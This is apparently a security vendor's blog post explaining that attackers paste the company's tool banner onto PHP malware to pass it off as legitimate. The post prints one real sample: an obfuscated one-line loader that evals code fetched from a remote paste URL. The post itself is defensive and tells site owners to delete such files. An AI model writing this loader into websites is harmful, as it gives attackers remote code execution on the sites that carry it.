The most common example of this is simply injecting malicious code into one of our site cleaning tools. While not particularly clever, it is extremely effective. The average person has no idea who wrote what, or even what the code in that file does. They shouldn’t have to. Unfortunately, not knowing means that the nice “Monarx Security Tool” banner makes it look like Monarx is the author of malware.
To be clear: we have never, will never, infect anyone’s website. Our job is to defend the site owners from cyber-attacks, and we are passionate about doing just that.
How It Works
As mentioned, the mechanism isn’t complicated, just effective. Our site cleaning tools start with a banner to help identify them to anyone who happens to see them on disk while we are working.
That banner looks something like:
===========================================================================================
___ ___
| \/ | Copyright (C) 2017-2023, Monarx, Inc.
| . . | ___ _ __ __ _ _ __ __ __
| |\/| | / _ \ | '_ \ / _` || '__|\ \/ /
| | | || (_) || | | || (_| || | > <
\_| |_/ \___/ |_| |_| \__,_||_| /_/\_\
==============================================================================================
@package Monarx Security Site Analyzer
@file monarx-analyzer.php
@copyright Monarx, Inc. Not for external use, redistribution, or sale.
@site https://www.monarx.com
Nothing crazy, just some basic information at the top of the file before the code for our actual tool.
Attackers take that and put it on top of their malware. A recent example,
<?php
/**===========================================================================================
___ ___
| \/ | Copyright (C) 2017-2023, Monarx, Inc.
| . . | ___ _ __ __ _ _ __ __ __
| |\/| | / _ \ | '_ \ / _` || '__|\ \/ /
| | | || (_) || | | || (_| || | > <
\_| |_/ \___/ |_| |_| \__,_||_| /_/\_\
==============================================================================================
@package Monarx Security Site Analyzer
@file monarx-analyzer.php
@copyright Monarx, Inc. Not for external use, redistribution, or sale.
@site https://www.monarx.com
==============================================================================================
<?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://rentry.co/gdm89/raw"));/**/?>
Word to the wise: don’t fetch that file and run it.
None of that garbage is our code. Not only is it poorly written, even for malware, it also doesn’t do anything except fetch and run another resource (the real malware). That’s very common for an injection (you don’t want to cram a ton of content into an otherwise good file, just enough to go and get the bad stuff). It’s also completely and utterly pointless for the actual authors of the file. If we wanted that content to be executed, we’d have just written it in the file.
It does have our header on it though, and our brand with it.
What Can Website Owners Do?
If you see a file with that Monarx Security header, delete it. Our tool isn’t intended to remain on disk after it’s used (a few hundred milliseconds after it’s written). There are edge cases where the tool can’t be removed (how attackers got ahold of it) but it is always safe to remove. Indeed, we highly recommend that you do – what you’re looking at isn’t ours at all.
Contact us! If you see a file with our header on it, we would love to know about it. If you see any file that looks suspicious, we would love to hear about that too. Together we can do more than any of us can alone.
TL;DR:
Hackers have copied the Monarx source header and are using it to distribute malware. If you see a file with a Monarx header, delete it – it’s not ours.